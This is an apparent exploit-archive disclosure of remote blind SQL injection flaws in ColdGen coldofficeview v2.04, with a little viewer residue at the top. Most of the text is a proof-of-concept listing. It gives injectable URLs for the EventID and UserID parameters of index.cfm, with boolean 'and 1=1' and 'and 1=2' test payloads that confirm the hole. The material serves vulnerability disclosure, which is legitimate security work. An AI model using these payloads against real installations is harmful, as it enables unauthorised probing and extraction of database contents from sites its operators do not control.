12 lines
No EOL
664 B
Text
12 lines
No EOL
664 B
Text
# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities
|
|
# Vendor: http://www.coldgen.com/
|
|
# Found by: mr_me (net-ninja.net)
|
|
|
|
PoC's
|
|
1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]
|
|
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true
|
|
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false
|
|
|
|
2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]
|
|
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true
|
|
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false |